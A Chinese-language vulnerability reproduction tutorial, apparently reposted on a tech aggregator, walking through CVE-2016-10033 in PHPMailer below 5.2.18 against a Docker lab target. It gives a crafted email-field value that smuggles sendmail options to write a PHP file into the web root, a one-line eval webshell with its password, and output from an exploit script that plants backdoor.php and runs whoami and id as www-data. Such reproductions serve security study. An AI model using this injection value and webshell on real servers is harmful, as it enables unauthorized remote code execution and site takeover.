首页 / PHP / PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了PHPMailer远程命令执行漏洞复现,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1949字,纯文字阅读大概需要3分钟。
内容图文
![PHPMailer远程命令执行漏洞复现](/upload/InfoBanner/zyjiaocheng/614/414bb7eda6c948fda2d79b905d6342a0.jpg)
?PHPMailer远程命令执行漏洞复现
一、漏洞简介
PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。
PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。
二、影响版本:
PHPMailer<5.2.18
三、漏洞复现
Docker环境:
dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033
拉去镜像启动环境:
http://192.168.1.107:8080/
http://192.168.1.107:8080/在name处随便输入比如“aaa”,在email处输入:?"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message处输入一句话木马:?<?php@eval($_POST['thelostworld']);?>
上传完一句话木马后,页面会响应3-5分钟,响应时间较长
木马地址:http://192.168.1.107:8080/a.php 密码:thelostworld
虚拟终端:
使用脚本:
获取脚本后台回复“PHPMailer”获取脚本
? Desktop ./exploit.sh192.168.1.107:8080[+] CVE-2016-10033exploitbyopsxcq[+] Exploiting192.168.1.107:8080??[+] Target exploited, acessing shell at http://192.168.1.107:8080/backdoor.php[+] Checkingifthe backdoor was createdontarget system[+] Backdoor.php foundonremote system[+] Running whoamiwww-dataRemoteShell> [+] Running ??RemoteShell> id[+] Running iduid=33(www-data) gid=33(www-data) groups=33(www-data)
访问木马地址:
http://192.168.1.107:8080/backdoor.php
参考:
https://www.cnblogs.com/Hi-blog/p/7812008.html
https://www.exploit-db.com/exploits/40968
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html
个人博客园:https://www.cnblogs.com/thelostworld/
FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article
欢迎添加本公众号作者微信交流,添加时备注一下“公众号”
内容总结
以上是互联网集市为您收集整理的PHPMailer远程命令执行漏洞复现全部内容,希望文章能够帮你解决PHPMailer远程命令执行漏洞复现所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。